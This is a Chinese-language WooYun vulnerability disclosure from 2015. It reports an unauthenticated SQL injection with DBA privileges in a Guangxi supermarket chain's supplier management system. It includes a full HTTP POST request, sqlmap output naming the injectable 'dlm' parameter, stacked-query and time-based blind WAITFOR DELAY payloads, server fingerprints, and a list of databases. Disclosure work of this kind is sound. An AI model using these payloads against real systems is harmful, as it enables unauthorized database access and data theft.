当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134559

漏洞标题:某超市某管理系统SQL注入(无需登录DBA权限)

相关厂商:康迈商业有限责任公司

漏洞作者: cloud克劳德

提交时间:2015-08-19 13:20

修复时间:2015-11-19 17:32

公开时间:2015-11-19 17:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向第三方安全合作伙伴开放
2015-10-15: 细节向核心白帽子及相关领域专家公开
2015-10-25: 细节向普通白帽子公开
2015-11-04: 细节向实习白帽子公开
2015-11-19: 细节向公众公开

简要描述:

利客隆超市是广西规模最大的大型超市,目前拥有二百多家连锁超市,日均客流量超过15万人次,消费积分卡发行量已经超过50万张,利客隆超市名列中国快速流通消费品销售100强。

详细说明:

广西利客隆供应链管理系统
http://**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
http://**.**.**.**
问题页面

123.png


POST /gys/other/regedit.aspx HTTP/1.1
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
User-Agent: Googlebot/2.1 (+http://**.**.**.**/bot.html)
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/default.aspx
Cookie: ASP.NET_SessionId=jzpkha5521150qu0b45spur0; haoke=; CheckCode=48239
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
SaveBtn=%a1%c0%a1%ea%a1%e4%3f&BackBtn=1%3f%a1%c0%3f&dlm=123&dlmm=1&dzyj=1&qrmm=1&yddh=1&zsxm=1&__VIEWSTATE=/wEPDwUKMTUxOTI2NDQ4OWRk


sqlmap identified the following injection points with a total of 92 HTTP(s) requests:
---
Parameter: dlm (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: SaveBtn=%a1%c0%a1%ea%a1%e4?&BackBtn=1?%a1%c0?&dlm=asd'; WAITFOR DELAY '0:0:20'--&dlmm=1&dzyj=1&qrmm=1&yddh=1&zsxm=1&__VIEWSTATE=/wEPDwUKMTUxOTI2NDQ4OWRk
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: SaveBtn=%a1%c0%a1%ea%a1%e4?&BackBtn=1?%a1%c0?&dlm=asd' WAITFOR DELAY '0:0:20'--&dlmm=1&dzyj=1&qrmm=1&yddh=1&zsxm=1&__VIEWSTATE=/wEPDwUKMTUxOTI2NDQ4OWRk
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wit_pro
[*] wit_scm_source


注册厂商后登录界面展示,注入是不需要登录的

login.png

漏洞证明:

http://**.**.**.**/

softbase.jpg


**.**.**.**/

186.jpg


**.**.**.**/

187.jpg


**.**.**.**/

188.jpg


http://**.**.**.**

**.**.**.**.jpg

修复方案:

过滤

版权声明:转载请注明来源 cloud克劳德@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-21 17:31

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无